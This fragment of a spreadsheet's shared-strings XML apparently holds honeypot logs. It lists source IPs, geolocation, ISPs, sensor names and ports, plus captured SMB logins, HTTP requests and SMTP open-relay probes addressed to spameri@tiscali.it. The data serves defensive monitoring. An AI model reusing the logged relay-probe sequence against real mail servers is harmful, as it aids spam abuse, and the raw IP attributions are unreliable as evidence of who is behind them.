    <t>SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H16</t>
  </si>
  <si>
    <t>23&amp;&amp;38440&amp;&amp;52702&amp;&amp;80&amp;&amp;9100&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:dc86:982f</t>
  </si>
  <si>
    <t>866214fbf379dd121e45c939dec3c6b4</t>
  </si>
  <si>
    <t>185.195.233.219</t>
  </si>
  <si>
    <t>{'spambot.bls.digibase.ca': ['unknown']}</t>
  </si>
  <si>
    <t>::ffff:b9c3:e9db</t>
  </si>
  <si>
    <t>0c703da811318a80fed0691ee1eceb36</t>
  </si>
  <si>
    <t>37.202.173.87</t>
  </si>
  <si>
    <t>35.7808</t>
  </si>
  <si>
    <t>AFAGH</t>
  </si>
  <si>
    <t>Aria Shatel PJSC</t>
  </si>
  <si>
    <t>::ffff:25ca:ad57</t>
  </si>
  <si>
    <t>a3fecd766beffb10827de68dc8262568</t>
  </si>
  <si>
    <t>185.196.11.182</t>
  </si>
  <si>
    <t>Bern</t>
  </si>
  <si>
    <t>Bern-Mittelland District</t>
  </si>
  <si>
    <t>2661552</t>
  </si>
  <si>
    <t>3000</t>
  </si>
  <si>
    <t>46.948</t>
  </si>
  <si>
    <t>7.44745</t>
  </si>
  <si>
    <t>42624</t>
  </si>
  <si>
    <t>Global-Data System IT Corporation</t>
  </si>
  <si>
    <t>{Data_SMTP:{'arg': 'None', 'command': 'RSET', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'LOGIN', 'command': 'AUTH', 'data': 'None'}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:b9c4:bb6</t>
  </si>
  <si>
    <t>7d9c3ce2c98f2c8e92aad547a69a6da6</t>
  </si>
  <si>
    <t>103.163.230.130</t>
  </si>
  <si>
    <t>1433&amp;&amp;445&amp;&amp;60485&amp;&amp;60806</t>
  </si>
  <si>
    <t>Kota Malang</t>
  </si>
  <si>
    <t>Malang</t>
  </si>
  <si>
    <t>1636722</t>
  </si>
  <si>
    <t>-7.98315</t>
  </si>
  <si>
    <t>112.661</t>
  </si>
  <si>
    <t>141907</t>
  </si>
  <si>
    <t>PT Metrosolusi Teknologi Indonesia</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.163.230.130,52142)}&amp;&amp;{Data_SMB:Incoming connection (103.163.230.130,52766)}&amp;&amp;{Data_SMB:Incoming connection (103.163.230.130,64798)}&amp;&amp;{Data_SMB:Incoming connection (103.163.230.130,65488)}&amp;&amp;{Data_SMB:Incoming connection (103.163.230.130,60485)}&amp;&amp;{Data_SMB:Incoming connection (103.163.230.130,60806)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.163.230.130,55785)}&amp;&amp;{Data_SMB:Incoming connection (103.163.230.130,56082)}&amp;&amp;{Data_SMB:Incoming connection (103.163.230.130,61969)}&amp;&amp;{Data_SMB:Incoming connection (103.163.230.130,62251)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:67a3:e682</t>
  </si>
  <si>
    <t>ece0bf3d4ff9de43aa1c1e05131e3049</t>
  </si>
  <si>
    <t>37.229.66.199</t>
  </si>
  <si>
    <t>23&amp;&amp;55451&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:25e5:42c7</t>
  </si>
  <si>
    <t>65336e8cfa71ac1cd387f16542047551</t>
  </si>
  <si>
    <t>178.137.249.13</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H45</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;2994&amp;&amp;45320&amp;&amp;NA</t>
  </si>
  <si>
    <t>2010-03-29</t>
  </si>
  <si>
    <t>::ffff:b289:f90d</t>
  </si>
  <si>
    <t>b86b0d6bbb82ee3f2c232c0a22d87912</t>
  </si>
  <si>
    <t>176.8.43.150</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_SMB_H20&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H29</t>
  </si>
  <si>
    <t>56008&amp;&amp;445&amp;&amp;20592&amp;&amp;23&amp;&amp;52503&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:b008:2b96</t>
  </si>
  <si>
    <t>97b31894cd98b3ffe73dd2153c3fac31</t>
  </si>
  <si>
    <t>157.66.103.45</t>
  </si>
  <si>
    <t>New Delhi (Jaitpur)</t>
  </si>
  <si>
    <t>110044</t>
  </si>
  <si>
    <t>28.5082</t>
  </si>
  <si>
    <t>77.3308</t>
  </si>
  <si>
    <t>152530</t>
  </si>
  <si>
    <t>FELET SERVICES PRIVATE LIMITED</t>
  </si>
  <si>
    <t>Felet Services Private Limited</t>
  </si>
  <si>
    <t>::ffff:9d42:672d</t>
  </si>
  <si>
    <t>962805f64668a02357b55378250ccdd6</t>
  </si>
  <si>
    <t>176.8.195.154</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H20&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_MT-CPA_H23</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;58669&amp;&amp;23626&amp;&amp;46479&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:b008:c39a</t>
  </si>
  <si>
    <t>71aa977d64b101c5a1864a8092f5ae14</t>
  </si>
  <si>
    <t>178.137.95.241</t>
  </si>
  <si>
    <t>23&amp;&amp;NA&amp;&amp;47198</t>
  </si>
  <si>
    <t>::ffff:b289:5ff1</t>
  </si>
  <si>
    <t>665f43ad7f9443aef154972480d86764</t>
  </si>
  <si>
    <t>46.118.75.173</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H21&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H32</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;25921&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:2e76:4bad</t>
  </si>
  <si>
    <t>4e57029aea34b63ba51bbfe08fee49b9</t>
  </si>
  <si>
    <t>37.229.232.139</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_SMB_H5&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H19</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;445&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:25e5:e88b</t>
  </si>
  <si>
    <t>90aefb7af8396d94f39ed1deee06a3c1</t>
  </si>
  <si>
    <t>117.245.210.69</t>
  </si>
  <si>
    <t>::ffff:75f5:d245</t>
  </si>
  <si>
    <t>8d692dfe83349572a72564d608fd8fb9</t>
  </si>
  <si>
    <t>178.137.82.174</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_SSH_H4&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H34</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;22&amp;&amp;13056&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:b289:52ae</t>
  </si>
  <si>
    <t>983fab99d7dc23fecfcfbb2f860008f2</t>
  </si>
  <si>
    <t>14.99.91.9</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H13&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H19&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_SMB_H43&amp;&amp;SMA-LAB_MYSQL_H43&amp;&amp;SMA-LAB_MSSQL_H43</t>
  </si>
  <si>
    <t>52686&amp;&amp;1433&amp;&amp;445&amp;&amp;64166&amp;&amp;3306</t>
  </si>
  <si>
    <t>45820</t>
  </si>
  <si>
    <t>TTSL-ISP DIVISION</t>
  </si>
  <si>
    <t>Tata Teleservices LTD Cdma</t>
  </si>
  <si>
    <t>::ffff:e63:5b09</t>
  </si>
  <si>
    <t>76f57df72bb13ef20c76b6332ad69121</t>
  </si>
  <si>
    <t>117.215.18.14</t>
  </si>
  <si>
    <t>::ffff:75d7:120e</t>
  </si>
  <si>
    <t>9107d7a8a43931d72d218c77c77c54aa</t>
  </si>
  <si>
    <t>202.53.82.5</t>
  </si>
  <si>
    <t>Hyderabad (Ambedkar Colony)</t>
  </si>
  <si>
    <t>17.4065</t>
  </si>
  <si>
    <t>78.4723</t>
  </si>
  <si>
    <t>10225</t>
  </si>
  <si>
    <t>Nettlinx Limited</t>
  </si>
  <si>
    <t>Nettlinx</t>
  </si>
  <si>
    <t>::ffff:ca35:5205</t>
  </si>
  <si>
    <t>bcaf03eeb634937db54a285041ed7271</t>
  </si>
  <si>
    <t>46.118.108.148</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H33</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;39720&amp;&amp;53286&amp;&amp;43496&amp;&amp;NA</t>
  </si>
  <si>
    <t>2010-05-17</t>
  </si>
  <si>
    <t>::ffff:2e76:6c94</t>
  </si>
  <si>
    <t>eebeb3e958496b6907012920bef2c392</t>
  </si>
  <si>
    <t>59.97.246.118</t>
  </si>
  <si>
    <t>::ffff:3b61:f676</t>
  </si>
  <si>
    <t>aa32dd2151566f3821163371a1bbd038</t>
  </si>
  <si>
    <t>176.8.204.89</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H12</t>
  </si>
  <si>
    <t>2011-05-13</t>
  </si>
  <si>
    <t>::ffff:b008:cc59</t>
  </si>
  <si>
    <t>5d39c0048132531c65805faade000863</t>
  </si>
  <si>
    <t>37.229.47.62</t>
  </si>
  <si>
    <t>Horishni Plavni</t>
  </si>
  <si>
    <t>6559559</t>
  </si>
  <si>
    <t>49.0084</t>
  </si>
  <si>
    <t>33.6293</t>
  </si>
  <si>
    <t>::ffff:25e5:2f3e</t>
  </si>
  <si>
    <t>ca9a5d3feb652b668819659e245acb06</t>
  </si>
  <si>
    <t>178.137.39.66</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H5</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;NA&amp;&amp;47378&amp;&amp;54124</t>
  </si>
  <si>
    <t>::ffff:b289:2742</t>
  </si>
  <si>
    <t>c8908a27ccf586e77ee2f0df21989550</t>
  </si>
  <si>
    <t>46.119.66.19</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H28</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;1741&amp;&amp;57553&amp;&amp;NA</t>
  </si>
  <si>
    <t>Donetsk</t>
  </si>
  <si>
    <t>Kramatorsk Raion</t>
  </si>
  <si>
    <t>Kramatorsk</t>
  </si>
  <si>
    <t>704508</t>
  </si>
  <si>
    <t>48.739</t>
  </si>
  <si>
    <t>37.5844</t>
  </si>
  <si>
    <t>::ffff:2e77:4213</t>
  </si>
  <si>
    <t>a26cfe788e7227c578cf25fd12103c22</t>
  </si>
  <si>
    <t>59.92.192.104</t>
  </si>
  <si>
    <t>::ffff:3b5c:c068</t>
  </si>
  <si>
    <t>6b5174ba366a28ce60039b882274a1a0</t>
  </si>
  <si>
    <t>117.219.167.27</t>
  </si>
  <si>
    <t>::ffff:75db:a71b</t>
  </si>
  <si>
    <t>e9f7c98f833acdcd46c765f5edc86366</t>
  </si>
  <si>
    <t>219.91.56.93</t>
  </si>
  <si>
    <t>nk219-91-56-93.adsl.dynamic.apol.com.tw&amp;&amp;NA</t>
  </si>
  <si>
    <t>131627</t>
  </si>
  <si>
    <t>Peicity Digital Cable Television., LTD</t>
  </si>
  <si>
    <t>Asia Pacific On-line Services Inc.</t>
  </si>
  <si>
    <t>APOL</t>
  </si>
  <si>
    <t>::ffff:db5b:385d</t>
  </si>
  <si>
    <t>5872bd45ffd9d9d35042cd2f71926e6e</t>
  </si>
  <si>
    <t>37.229.71.193</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_DNS_H4&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H39</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;53&amp;&amp;47037&amp;&amp;40394&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:25e5:47c1</t>
  </si>
  <si>
    <t>25ed925af842c2d2ee5e258177d5a932</t>
  </si>
  <si>
    <t>46.119.66.90</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_SSH_H7&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_MT-CPA_H19</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;22&amp;&amp;51711&amp;&amp;60672&amp;&amp;48268&amp;&amp;19147&amp;&amp;47404&amp;&amp;60969&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:2e77:425a</t>
  </si>
  <si>
    <t>319d00daa83157189078167f1af0f5a2</t>
  </si>
  <si>
    <t>46.185.117.222</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H39</t>
  </si>
  <si>
    <t>23&amp;&amp;57042&amp;&amp;NA&amp;&amp;41040</t>
  </si>
  <si>
    <t>2010-11-10</t>
  </si>
  <si>
    <t>::ffff:2eb9:75de</t>
  </si>
  <si>
    <t>9148828e9fa40fd4ea0e864abc4073d0</t>
  </si>
  <si>
    <t>59.180.171.38</t>
  </si>
  <si>
    <t>::ffff:3bb4:ab26</t>
  </si>
  <si>
    <t>b0fdd35b991ea2bac99fb1273504e338</t>
  </si>
  <si>
    <t>67.209.244.4</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H8</t>
  </si>
  <si>
    <t>23&amp;&amp;38713</t>
  </si>
  <si>
    <t>Isabella</t>
  </si>
  <si>
    <t>Mount Pleasant</t>
  </si>
  <si>
    <t>5002714</t>
  </si>
  <si>
    <t>48858</t>
  </si>
  <si>
    <t>43.6079</t>
  </si>
  <si>
    <t>-84.7673</t>
  </si>
  <si>
    <t>17143</t>
  </si>
  <si>
    <t>Winn Telecom</t>
  </si>
  <si>
    <t>2008-10-20</t>
  </si>
  <si>
    <t>WINN-TELECOM-INET-200810</t>
  </si>
  <si>
    <t>::ffff:43d1:f404</t>
  </si>
  <si>
    <t>20195460b1268ac8c9ee5d6db5049aa4</t>
  </si>
  <si>
    <t>117.200.106.30</t>
  </si>
  <si>
    <t>::ffff:75c8:6a1e</t>
  </si>
  <si>
    <t>eba153a9f8d70263afeb8a171757be38</t>
  </si>
  <si>
    <t>178.131.20.112</t>
  </si>
  <si>
    <t>35.7477</t>
  </si>
  <si>
    <t>51.4021</t>
  </si>
  <si>
    <t>50810</t>
  </si>
  <si>
    <t>Mobinnet-AS</t>
  </si>
  <si>
    <t>Mci</t>
  </si>
  <si>
    <t>::ffff:b283:1470</t>
  </si>
  <si>
    <t>d1d94a614ed1d707cd76ae206fc256df</t>
  </si>
  <si>
    <t>37.229.244.18</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H47</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;34468&amp;&amp;60354&amp;&amp;29252&amp;&amp;43391&amp;&amp;43392&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:25e5:f412</t>
  </si>
  <si>
    <t>ff4697f148993d8ccbcba31a0fc7f322</t>
  </si>
  <si>
    <t>205.164.205.42</t>
  </si>
  <si>
    <t>ISLAND-NETWORKS-LTD</t>
  </si>
  <si>
    <t>Agis</t>
  </si>
  <si>
    <t>::ffff:cda4:cd2a</t>
  </si>
  <si>
    <t>98e35658b69134960a02d2599147128d</t>
  </si>
  <si>
    <t>117.207.166.250</t>
  </si>
  <si>
    <t>::ffff:75cf:a6fa</t>
  </si>
  <si>
    <t>3987b337a8c0ea8ad54091ab2c63244e</t>
  </si>
  <si>
    <t>45.144.212.84</t>
  </si>
  <si>
    <t>SMA-LAB_SMTP_H8&amp;&amp;SMA-LAB_SMTP_HC1</t>
  </si>
  <si>
    <t>{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'RSET', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'from:&lt;spameri@tiscali.it&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'to:&lt;spameri@tiscali.it&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'DATA', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '109.123.229.33_x000D_
To: spameri@tiscali.it_x000D_
Date: Mon, 10 Feb 2025 17:07:04 -0800_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'LOGIN', 'command': 'AUTH', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '109.123.229.33_x000D_
To: spameri@tiscali.it_x000D_
Date: Fri, 14 Feb 2025 23:51:48 -0800_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000D_
To: spameri@tiscali.it_x000D_
Date: Sat, 22 Feb 2025 15:05:35 -0800_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '45.14.244.111_x000D_
To: spameri@tiscali.it_x000D_
Date: Tue, 25 Feb 2025 07:35:30 -0800_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '95.164.21.98_x000D_
To: spameri@tiscali.it_x000D_
Date: Sun, 2 Mar 2025 16:09:29 -0800_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '185.234.67.80_x000D_
To: spameri@tiscali.it_x000D_
Date: Tue, 4 Mar 2025 03:04:20 -0800_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '185.234.67.80_x000D_
To: spameri@tiscali.it_x000D_
Date: Tue, 4 Mar 2025 03:31:33 -0800_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '185.234.67.80_x000D_
To: spameri@tiscali.it_x000D_
Date: Tue, 4 Mar 2025 09:54:41 -0800_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '66.94.127.183_x000D_
To: spameri@tiscali.it_x000D_
Date: Thu, 6 Mar 2025 12:24:28 -0800_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:2d90:d454</t>
  </si>
  <si>
    <t>6fd461577bd9137ce5262284f9e321aa</t>
  </si>
  <si>
    <t>94.55.216.67</t>
  </si>
  <si>
    <t>TURKSAT</t>
  </si>
  <si>
    <t>::ffff:5e37:d843</t>
  </si>
  <si>
    <t>3795c5f2659697268c88016a1e965650</t>
  </si>
  <si>
    <t>46.118.189.9</t>
  </si>
  <si>
